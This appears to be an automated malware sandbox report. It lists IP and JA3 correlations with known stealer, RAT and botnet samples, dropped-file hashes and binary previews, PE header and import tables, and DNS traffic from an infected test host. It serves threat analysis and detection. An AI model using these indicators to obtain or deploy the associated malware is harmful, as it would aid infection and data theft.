	ARMV7L.elf	Get hash	malicious	Mirai	Browse	54.247.62.1
	systempreter.exe	Get hash	malicious	AsyncRAT	Browse	3.69.157.220
	http://ghostbin.cafe24.com/	Get hash	malicious	Unknown	Browse	13.32.99.103
	rjnven64.elf	Get hash	malicious	Mirai	Browse	54.171.230.55
	https://gogl.to/3HGT	Get hash	malicious	CAPTCHA Scam ClickFix, DcRat, KeyLogger, StormKitty, VenomRAT	Browse	18.245.31.129
	Epsilon.exe	Get hash	malicious	Unknown	Browse	185.166.143.48
CLOUDFLARENETUS	x6VtGfW26X.exe	Get hash	malicious	LummaC	Browse	104.21.112.1
	heteronymous.vbs	Get hash	malicious	Remcos, GuLoader	Browse	172.67.136.42
	re5.mp4.hta	Get hash	malicious	LummaC	Browse	188.114.96.3
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	188.114.96.3
	zku4YyCG6L.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	hca5qDUYZH.exe	Get hash	malicious	Unknown	Browse	188.114.96.3
	PO_2024_056209_MQ04865_ENQ_1045.exe	Get hash	malicious	MassLogger RAT, PureLog Stealer	Browse	188.114.96.3
	DIS_37745672.pdf	Get hash	malicious	KnowBe4, PDFPhish	Browse	104.17.247.203
	Poket.mp4.hta	Get hash	malicious	LummaC	Browse	188.114.97.3
	https://nutricarm.es/wp-templates/f8b83.php	Get hash	malicious	Unknown	Browse	104.21.96.1
AKAMAI-ASN1EU	http://ghostbin.cafe24.com/	Get hash	malicious	Unknown	Browse	95.101.148.20
	kwari.arm.elf	Get hash	malicious	Unknown	Browse	172.237.42.205
	BHgwhz3lGN.exe	Get hash	malicious	Vidar	Browse	23.44.203.178
	botx.sh4.elf	Get hash	malicious	Mirai	Browse	172.238.68.235
	sh4.elf	Get hash	malicious	Mirai, Moobot	Browse	184.84.115.37
	Tool_Unlock_v1.2.exe	Get hash	malicious	Vidar	Browse	23.219.82.59
	gdi32.dll	Get hash	malicious	LummaC	Browse	23.55.153.106
	Loader.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	iien1HBbB3.exe	Get hash	malicious	LummaC	Browse	23.55.153.106
	oe9KS7ZHUc.exe	Get hash	malicious	LummaC	Browse	23.55.153.106

JA3 Fingerprints

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link	Context
3b5074b1b5d032e5620f69f9f700ff0e	heteronymous.vbs	Get hash	malicious	Remcos, GuLoader	Browse	40.115.3.253
	re5.mp4.hta	Get hash	malicious	LummaC	Browse	40.115.3.253
	file.exe	Get hash	malicious	Snake Keylogger, VIP Keylogger	Browse	40.115.3.253
	Poket.mp4.hta	Get hash	malicious	LummaC	Browse	40.115.3.253
	Fizzy Loader.exe	Get hash	malicious	Blank Grabber, Umbral Stealer	Browse	40.115.3.253
	Epsilon.exe	Get hash	malicious	Unknown	Browse	40.115.3.253
	XClient.exe	Get hash	malicious	XWorm	Browse	40.115.3.253
	hoEtvOOrYH.exe	Get hash	malicious	SmokeLoader	Browse	40.115.3.253
	web44.mp4.hta	Get hash	malicious	LummaC	Browse	40.115.3.253
	random.exe	Get hash	malicious	LummaC	Browse	40.115.3.253
37f463bf4616ecd445d4a1937da06e19	heteronymous.vbs	Get hash	malicious	Remcos, GuLoader	Browse	116.203.14.4 149.154.167.99
	zku4YyCG6L.exe	Get hash	malicious	Unknown	Browse	116.203.14.4 149.154.167.99
	hca5qDUYZH.exe	Get hash	malicious	Unknown	Browse	116.203.14.4 149.154.167.99
	Loader.exe	Get hash	malicious	Meduza Stealer	Browse	116.203.14.4 149.154.167.99
	setup.msi	Get hash	malicious	Unknown	Browse	116.203.14.4 149.154.167.99
	BHgwhz3lGN.exe	Get hash	malicious	Vidar	Browse	116.203.14.4 149.154.167.99
	Open Purchase Order Summary Details-16-12-2024.vbs	Get hash	malicious	LodaRAT, XRed	Browse	116.203.14.4 149.154.167.99
	Open Purchase Order Summary Sheet.vbs	Get hash	malicious	LodaRAT, XRed	Browse	116.203.14.4 149.154.167.99
	Purchase Order Summary Details.vbs	Get hash	malicious	LodaRAT, XRed	Browse	116.203.14.4 149.154.167.99
	Purchase Order Summary Details.vbs	Get hash	malicious	LodaRAT, XRed	Browse	116.203.14.4 149.154.167.99

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Threat Name	Link
C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com	vlid_acid.exe	Get hash	malicious	LummaC Stealer	Browse
	AquaPac.exe	Get hash	malicious	LummaC Stealer	Browse
	0442.pdf.exe	Get hash	malicious	Remcos	Browse
	installer_1.05_36.5.exe	Get hash	malicious	LummaC	Browse
	@Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	!Set-up..exe	Get hash	malicious	LummaC Stealer	Browse
	!Setup.exe	Get hash	malicious	LummaC Stealer	Browse
	SgMuuLxOCJ.exe	Get hash	malicious	LummaC	Browse
	TNyOrM6mIM.exe	Get hash	malicious	LummaC	Browse
	j2nLC29vCy.exe	Get hash	malicious	LummaC	Browse

Process:	C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\330775\Evans.com
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 10, database pages 91, cookie 0x36, schema 4, UTF-8, version-valid-for 10
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.2649904685014508
Encrypted:	false
SSDEEP:	384:8/2qOB1nxCkMbSAELyKOMq+8yC8F/YfU5m+OlTLVumc:Bq+n0Jb9ELyKOMq+8y9/Owb
MD5:	17044C1AD07ECE7095D4C78C00DD0DD6
SHA1:	3047F1B9A76AB980BC89B6F392B48721469FC89F
SHA-256:	D9868D43378FD125A4C70C558F0B949624859676D196C7E3FC3080F70E2B0292
SHA-512:	73A24129A90D3B0CBC68AD39235ECB6BAA4287877FDE514A2C03B69B53DB2AA76B8D4DBCCFCA7398932A1033A8B4ED9FF51A98E18F84D3453C7500E106470E37
Malicious:	false
Preview:	SQLite format 3......@ .......[...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	44137
Entropy (8bit):	6.090726234171398
Encrypted:	false
SSDEEP:	768:zDXzgWPsj/qlGJqIY8GB4kkBMmwuF9hDO6vP6O+ttbzy70FqHoPFkGoup1Xl3jVu:z/Ps+wsI7ynEA6Utbz8hu3VlXr4CRo1
MD5:	B368358F6E963E0B802A103CB02EA4B6
SHA1:	E892EF2580C9227766A87B9A9AE002B8D13C742D
SHA-256:	DEB635F97706C2317D11561162008D9C4D2E4F11F7494A6BF635502069D32F17
SHA-512:	1B668CB997ED518FA6E6E6C1A744F5F25BCCDEEEECD09FEC4FAC719D4BE6483F0CA3472376F79F48AD9BD3699FCC6BDB6ABE7412F35C6D0E66FC393C231B2729
Malicious:	false
Preview:	{"abusive_adblocker_etag":"\"229EC35087C81534A88F41A12F3A505F330A0BE57C43F6CEB29F4718042EFC4F\"","desktop_mode":{"clear_prefs_once_applied":true,"is_on":false,"is_on_by_default_applied":true,"is_search_only_on_by_default_applied":true},"domain_actions_config":"H4sIAAAAAAAAAL19a4/cNpboXzH60+4gRbvbrzj7aTbj2Ql2MhlkswhwF4MGRVISWxQp81FVqkH++z2HUrXbLkndh51dBHba1XX4PDzvxz+v+P76VjipxG2teExe3YpWie7W7ZX3Wqqr7/55xYfBaMGjdjZcffc/8wdK3g4OPh+vvrv6aYg/pXj1zZV0PdcWPrEq1kYfmXD91W/fUEBCTFK7MEH+45urDKHVNLPlvXoIHMcB//3H/fX3uIk/T3v4HrcwfweHgL0EWPzVd9e/fXMlZE/dnTXjx+Pggvq74ePPisvx4bqD0bbZ2Og99K8w415b9RA4usTivgSy50f4WTHYRQE0r0TxkvcMIVQpvOHvmY4lkMdaWx3H0okPPIoWVi/cFl5uDqEbWICCMbxrAKlKh6lMUiL5PY4UWn5ggpcM0yp8Ynv4jYve2dLVCA978oD/ouXWKlM6jo08toiSpffjDoNXQdkYBpOKD3ffHgufVJtMKp0Vvs4+JS06uJShdJA/6dD+0Y6HVnm1TQAXSdJMDfEjnz/CJVxAPJh4Brj/5JJYZtZAI5d/gW/+WP9F7UWmyTTSsQFstY3KSrd5MJfw8x4ffriwzR5P5lZboOXq2cwPcaHxvO+5N1vU6gKw18K74OqIVMGrwcGWi+B3/fhgiJ2sSYzY4W5ZcE8FcFZJr/eKGfyLMJOray0KIOCL4cFk21LCwm0jIsXbWhuge7fO3sKot+GggT0

Process:	C:\Windows\SysWOW64\cmd.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	modified
Size (bytes):	947288
Entropy (8bit):	6.630612696399572
Encrypted:	false
SSDEEP:	24576:uvG4FEq/TQ+Svbi3zcNjmsuENOJuM8WU2a+BYK:u9GqLQHbijkmc2umva+OK
MD5:	62D09F076E6E0240548C2F837536A46A
SHA1:	26BDBC63AF8ABAE9A8FB6EC0913A307EF6614CF2
SHA-256:	1300262A9D6BB6FCBEFC0D299CCE194435790E70B9C7B4A651E202E90A32FD49
SHA-512:	32DE0D8BB57F3D3EB01D16950B07176866C7FB2E737D9811F61F7BE6606A6A38A5FC5D4D2AE54A190636409B2A7943ABCA292D6CEFAA89DF1FC474A1312C695F
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: vlid_acid.exe, Detection: malicious, Browse Filename: AquaPac.exe, Detection: malicious, Browse Filename: 0442.pdf.exe, Detection: malicious, Browse Filename: installer_1.05_36.5.exe, Detection: malicious, Browse Filename: @Setup.exe, Detection: malicious, Browse Filename: !Set-up..exe, Detection: malicious, Browse Filename: !Setup.exe, Detection: malicious, Browse Filename: SgMuuLxOCJ.exe, Detection: malicious, Browse Filename: TNyOrM6mIM.exe, Detection: malicious, Browse Filename: j2nLC29vCy.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........;..h..h..hX;1h..hX;3hq..hX;2h..hr..h..h...i...h...i...h...i...h..Ch..h..Sh..h..h..hI..i...hI..i..hI.?h..h.Wh..hI..i..hRich..h........PE..L......b.........."...............................@..................................k....@...@.......@.........................\|....P..h............N..X&...0..tv...........................C..........@............................................text............................... ..`.rdata..............................@..@.data....p.......H..................@....rsrc...h....P......................@..@.reloc..tv...0...x..................@..B................................................................................................................................................................................................................................................................................

Process:	C:\Windows\SysWOW64\extrac32.exe
File Type:	data
Category:	dropped
Size (bytes):	115712
Entropy (8bit):	6.558230309108238
Encrypted:	false
SSDEEP:	3072:tkBJR8CThpmESv+AqVnBypIbv18mLthfhnueoMmOqDoioOr:tkB0CThp6vmVnjphfhnvOr
MD5:	61277731D75DBD17C60470D78B8D5D74
SHA1:	5DF0BC68537C229FF6DCCFB49B1961D8C5F0319B
SHA-256:	D0F123087C766D77BA93496A1F74E967C0523A15D953BDAB7984790785C36D3F
SHA-512:	F9B6F4F2040964F5C4F846B0C1E0CA1CD41D2ACD1AA2DD4D2D9C1F2C268C24FC2D1054B0FF2CF0E50A8E0A6B70A6BB8A228E09A6934C52D37EE521F2E49F3E28
Malicious:	false
Preview:	P.\r...u..t.V.M....h..I..M.....M..~...}..\|<V.M..vD..j..u..M...l..h\tL..M..a...E.P.M..:..h..I..M..H..hltL..M..;*...E.P.M..h:...=d#M..t@.}..t..u.V.u..u..u.h.zL..#d......5.u.............h.zL...d.......h.....u..u..5.#M.....I... ..........t..]........M..\#M...{...M..{...M..{...M..{...M..{.._^[....U... .......VW3.3.f..............Vh....PV...u...0.I.P..RVh........I.........P..p...._^..U..E...x...x...;.}.P......M..0..C.......M...z..2.]...U....V.u...M..p...E.P............M...z..^....U.....=a#M..V..t...M......3...3.8..)M.t.9............P5M.@.P5M.9.....u.8.....u......t.....I.........3.j.QQ......Q.z.}...........)M....t8;.D)M.}).@)M........t..x..t..M.Q.p..0....I...t..-...)M...E..(M.P.....u..E.P..T.I..E.P..L.I.j.3.PPP.E.P....I.....t.....................=b#M..u...g#M....b#M....................u.3.@...=g#M..t.j.X..3.^..U..Q.}..SVW..........d......E.t..u.....u.........}..t...3M...........4...;.r..E......._^[....U..QQ.}..SVW....d......E.t..u..8......T....u...P.............E.

Process:	C:\Users\user\Desktop\6684V5n83w.exe
File Type:	data
Category:	dropped
Size (bytes):	89088
Entropy (8bit):	7.997894676048347
Encrypted:	true
SSDEEP:	1536:BhBfWL3/WpnJyNBXWPkbgFjcRnlibR0R/V8zuk3hInzfnSuKfo98CbHvOJKn0GXe:BhBfWrWp9PkbW5buhV8Ks8fngfo9803E
MD5:	B801B07EDE1FD827573114FA8332409D
SHA1:	BE62683D0374D61B40FAA2D88ED7D47F5AAEE57C
SHA-256:	FC5F27DCAA5271F50C6CC96AAAE0212E7D6155C8B49B864B3B480607EAB133E1
SHA-512:	61764558BBED4B47FA0266DB025E64231D85935995A2535522945DCB0F59101D11224853EA0DF793A43A8E70825660942E7466187DF9BB35144F85CC8B98F696
Malicious:	false
Preview:	AzS{.6.tob......U.j.T..Q....b...B...iyD..(.{.+..S\|y....R....Kp^T.DC..mRGtP$SB...k........I=...X.i&...z.r...Z..\|L.w.{..L.t..z.....t.9.....;/.`5R.Q.....r...]i.9+F...\|.f.../..%.7f..fM.!...\|.{L....d4]...d.}7.:[...W..t....:..l.......D`..r.F..!...R6e....B5........_C...1.h9..n..q....Z......O..1.c.x.S..xY.x.....7z.\|@....T.\|5.v.,.I...&./.p...%...e..=x...7C.k[hkH..\|.eG.u..\|..y.F...@....AX....d..A...F.....i...{.`....N/...\|...V%.d.K.v.>.d....F.....b...~%>..%..z...%........[..."T.x..#.S.,.R.-.(x.+.&...\....t$0...}.7.\;.!..^...J.V.J.h.Kg66b..M......4.O..7Q..),.q.Z...j.".&.jWW."....O..Q.5....Y.f....8.{....=....S.olo....h.....f....dz7.;B.Z.(....g..k[c....G.Y5T.6.....7.....x......~.. ..$.[...q.L~.....j...v..p.u-.n.b/..`0\..^.;..=&U.O.K.;.=.O8.mY.T.t(l..d..L.g+.....*'.Sd`=.O+.E2#.....E....j.8....l.)..'@....vy..ZlLZ..9..s..}h......p..q9462.......A.!..k..E.j......^.8N.w.....SP3..w...A.;@4..#P.%s6,...M......H..3.<..........k..:....,&.......)$..o6...Q..M.b.-R.T.."

Process:	C:\Program Files\Google\Chrome\Application\chrome.exe
File Type:	MS Windows shortcut, Item id list present, Points to a file or directory, Has Relative path, Has Working directory, Has command line arguments, Icon number=0, Archive, ctime=Tue Oct 3 09:48:42 2023, mtime=Tue Dec 31 07:46:16 2024, atime=Wed Sep 27 04:28:28 2023, length=1210144, window=hide
Category:	dropped
Size (bytes):	2677
Entropy (8bit):	3.980750231210393
Encrypted:	false
SSDEEP:	48:8edjTLLTHUidAKZdA19ehwiZUklqehsJy+3:8eLmBJy
MD5:	1C28F2F01AA909C0264C0E0F7E196139
SHA1:	12FBBE7A1D67FC9A3537D3879F23A6A7D9F9DCBA
SHA-256:	6ACF6B7952AEE95A94A7E14908054C222932C4F92F0622F24670E7A2184E077F
SHA-512:	37FE8F599D5612709D966D1A7202C1B18F27E098438CC0EFC1527259CEAD8AB34EED0303ACF67AD85F82C5D5934BDDDC547A349E94B5CBA9B2E6351E15CD6BB8
Malicious:	false
Preview:	L..................F.@.. ...$+.,.....]t`[..N.Yr.... w......................1....P.O. .:i.....+00.../C:\.....................1.....DWWn..PROGRA~1..t......O.I.Y.E....B...............J......SX.P.r.o.g.r.a.m. .F.i.l.e.s...@.s.h.e.l.l.3.2...d.l.l.,.-.2.1.7.8.1.....T.1.....CW.V..Google..>......CW.V.Y.E....L.....................p+j.G.o.o.g.l.e.....T.1.....CW.V..Chrome..>......CW.V.Y.E....M......................8..C.h.r.o.m.e.....`.1.....CW.V..APPLIC~1..H......CW.V.Y.E..........................."&.A.p.p.l.i.c.a.t.i.o.n.....n.2. w..;W.+ .CHROME~1.EXE..R......CW.V.Y.E...........................H..c.h.r.o.m.e._.p.r.o.x.y...e.x.e.......j...............-.......i..............l.....C:\Program Files\Google\Chrome\Application\chrome_proxy.exe..S.....\.....\.....\.....\.....\.....\.....\.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.\.c.h.r.o.m.e._.p.r.o.x.y...e.x.e.*.C.:.\.P.r.o.g.r.a.m. .F.i.l.e.s.\.G.o.o.g.l.e.\.C.h.r.o.m.e.\.A.p.p.l.i.c.a.t.i.o.n.F

Entrypoint:	0x403883
Entrypoint Section:	.text
Digitally signed:	true
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
Time Stamp:	0x4E807C58 [Mon Sep 26 13:21:28 2011 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	0
File Version Major:	5
File Version Minor:	0
Subsystem Version Major:	5
Subsystem Version Minor:	0
Import Hash:	be41bf7b8cc010b614bd36bbca606973

Signature Valid:	false
Signature Issuer:	CN=Microsoft Code Signing PCA 2011, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Signature Validation Error:	The digital signature of the object did not verify
Error Number:	-2146869232
Not Before, Not After	24/04/2024 22:20:25 19/04/2025 22:20:25
Subject Chain	CN=Skype Software Sarl, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version:	3
Thumbprint MD5:	DCACFC48C220E288EE97E70A6850405C
Thumbprint SHA-1:	F05F9F4EA0A299F5AD361A9F96D5D57DD3B17D8B
Thumbprint SHA-256:	1C2B9B164269689BB5348EAAF60345BF635B32FD61B0230420C8BE7F94B3C56B
Serial:	33000003DDA34EC21B604513590000000003DD

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x9b34	0xb4	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0xf4000	0xc8ce	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x118cf7	0x2820
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x7a000	0x964	.ndata
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x8000	0x2d0	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x6dae	0x6e00	00499a6f70259150109c809d6aa0e6ed	False	0.6611150568181818	data	6.508529563136936	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x8000	0x2a62	0x2c00	07990aaa54c3bc638bb87a87f3fb13e3	False	0.3526278409090909	data	4.390535020989255	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0xb000	0x67ebc	0x200	014871d9a00f0e0c8c2a7cd25606c453	False	0.203125	data	1.4308602597540492	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.ndata	0x73000	0x81000	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc	0xf4000	0xc8ce	0xca00	26251fae843031de586a0a803b86fdd1	False	0.9064820544554455	data	7.646763975980649	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x101000	0xf32	0x1000	10c79edbd8bfd9b535bc7dd881c68ef2	False	0.6005859375	data	5.52875900076339	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
RT_ICON	0xf41f0	0x7411	PNG image data, 128 x 128, 8-bit/color RGBA, non-interlaced	English	United States	1.0005384848382863
RT_ICON	0xfb604	0x26e0	PNG image data, 64 x 64, 8-bit/color RGBA, non-interlaced	English	United States	1.001105305466238
RT_ICON	0xfdce4	0x2668	Device independent bitmap graphic, 48 x 96 x 32, image size 9792	English	United States	0.604759967453214
RT_DIALOG	0x10034c	0x100	data	English	United States	0.5234375
RT_DIALOG	0x10044c	0x11c	data	English	United States	0.6056338028169014
RT_DIALOG	0x100568	0x60	data	English	United States	0.7291666666666666
RT_GROUP_ICON	0x1005c8	0x30	data	English	United States	0.875
RT_MANIFEST	0x1005f8	0x2d6	XML 1.0 document, ASCII text, with very long lines (726), with no line terminators	English	United States	0.5647382920110193

DLL	Import
KERNEL32.dll	SetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
USER32.dll	GetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
GDI32.dll	SetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
SHELL32.dll	SHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
ADVAPI32.dll	RegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
COMCTL32.dll	ImageList_AddMasked, ImageList_Destroy, ImageList_Create
ole32.dll	CoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
VERSION.dll	GetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Dec 31, 2024 09:45:17.284779072 CET	61500	53	192.168.2.5	1.1.1.1
Dec 31, 2024 09:45:17.300282001 CET	53	61500	1.1.1.1	192.168.2.5
Dec 31, 2024 09:46:02.276854038 CET	51662	53	192.168.2.5	1.1.1.1
Dec 31, 2024 09:46:02.283384085 CET	53	51662	1.1.1.1	192.168.2.5
Dec 31, 2024 09:46:03.662466049 CET	55929	53	192.168.2.5	1.1.1.1
Dec 31, 2024 09:46:03.676537991 CET	53	55929	1.1.1.1	192.168.2.5
Dec 31, 2024 09:46:13.773951054 CET	53	55086	1.1.1.1	192.168.2.5
Dec 31, 2024 09:46:13.906526089 CET	51928	53	192.168.2.5	1.1.1.1
Dec 31, 2024 09:46:13.906660080 CET	56873	53	192.168.2.5	1.1.1.1
Dec 31, 2024 09:46:13.911480904 CET	53	52389	1.1.1.1	192.168.2.5
Dec 31, 2024 09:46:13.913381100 CET	53	51928	1.1.1.1	192.168.2.5
Dec 31, 2024 09:46:13.913391113 CET	53	56873	1.1.1.1	192.168.2.5
Dec 31, 2024 09:46:14.902267933 CET	53	56032	1.1.1.1	192.168.2.5
Dec 31, 2024 09:46:16.467598915 CET	53	58639	1.1.1.1	192.168.2.5
Dec 31, 2024 09:46:18.173966885 CET	50062	53	192.168.2.5	1.1.1.1
Dec 31, 2024 09:46:18.174474001 CET	54323	53	192.168.2.5	1.1.1.1
Dec 31, 2024 09:46:18.179426908 CET	53	59619	1.1.1.1	192.168.2.5
Dec 31, 2024 09:46:18.180780888 CET	53	50062	1.1.1.1	192.168.2.5
Dec 31, 2024 09:46:18.181685925 CET	53	54323	1.1.1.1	192.168.2.5
Dec 31, 2024 09:46:19.175679922 CET	50754	53	192.168.2.5	1.1.1.1
Dec 31, 2024 09:46:19.175848961 CET	55036	53	192.168.2.5	1.1.1.1
Dec 31, 2024 09:46:19.182830095 CET	53	50754	1.1.1.1	192.168.2.5
Dec 31, 2024 09:46:19.183377981 CET	53	55036	1.1.1.1	192.168.2.5
Dec 31, 2024 09:46:19.865196943 CET	53	64136	1.1.1.1	192.168.2.5
Dec 31, 2024 09:46:27.523332119 CET	58851	53	192.168.2.5	1.1.1.1
Dec 31, 2024 09:46:27.523530960 CET	57497	53	192.168.2.5	1.1.1.1
Dec 31, 2024 09:46:27.530635118 CET	53	57497	1.1.1.1	192.168.2.5
Dec 31, 2024 09:46:28.991080999 CET	64411	53	192.168.2.5	1.1.1.1
Dec 31, 2024 09:46:28.991333008 CET	63410	53	192.168.2.5	1.1.1.1
Dec 31, 2024 09:46:30.051295996 CET	63142	53	192.168.2.5	1.1.1.1
Dec 31, 2024 09:46:30.051548958 CET	51383	53	192.168.2.5	1.1.1.1
Dec 31, 2024 09:46:30.059083939 CET	53	63142	1.1.1.1	192.168.2.5
Dec 31, 2024 09:46:30.059293032 CET	53	51383	1.1.1.1	192.168.2.5
Dec 31, 2024 09:46:30.061224937 CET	54760	53	192.168.2.5	1.1.1.1
Dec 31, 2024 09:46:30.061357021 CET	57452	53	192.168.2.5	1.1.1.1
Dec 31, 2024 09:46:30.069442034 CET	53	57452	1.1.1.1	192.168.2.5
Dec 31, 2024 09:46:30.074866056 CET	65273	53	192.168.2.5	1.1.1.1
Dec 31, 2024 09:46:30.075306892 CET	50960	53	192.168.2.5	1.1.1.1
Dec 31, 2024 09:46:30.077773094 CET	63490	53	192.168.2.5	1.1.1.1
Dec 31, 2024 09:46:30.077927113 CET	52169	53	192.168.2.5	1.1.1.1
Dec 31, 2024 09:46:30.084397078 CET	53	52169	1.1.1.1	192.168.2.5
Dec 31, 2024 09:46:31.275532961 CET	63471	53	192.168.2.5	1.1.1.1
Dec 31, 2024 09:46:31.275773048 CET	53246	53	192.168.2.5	1.1.1.1
Dec 31, 2024 09:46:31.282769918 CET	53	63471	1.1.1.1	192.168.2.5
Dec 31, 2024 09:46:31.282841921 CET	53	53246	1.1.1.1	192.168.2.5
Dec 31, 2024 09:46:32.323586941 CET	62368	53	192.168.2.5	1.1.1.1
Dec 31, 2024 09:46:32.323745012 CET	52462	53	192.168.2.5	1.1.1.1
Dec 31, 2024 09:46:32.324139118 CET	50368	53	192.168.2.5	1.1.1.1
Dec 31, 2024 09:46:32.324327946 CET	55740	53	192.168.2.5	1.1.1.1
Dec 31, 2024 09:46:32.331337929 CET	53	62368	1.1.1.1	192.168.2.5
Dec 31, 2024 09:46:32.331648111 CET	53	52462	1.1.1.1	192.168.2.5
Dec 31, 2024 09:46:32.331834078 CET	53	50368	1.1.1.1	192.168.2.5
Dec 31, 2024 09:46:32.332169056 CET	53	55740	1.1.1.1	192.168.2.5
Dec 31, 2024 09:46:32.346270084 CET	50619	53	192.168.2.5	1.1.1.1
Dec 31, 2024 09:46:32.346440077 CET	64089	53	192.168.2.5	1.1.1.1
Dec 31, 2024 09:46:32.354885101 CET	53	50619	1.1.1.1	192.168.2.5
Dec 31, 2024 09:46:32.354902983 CET	53	64089	1.1.1.1	192.168.2.5
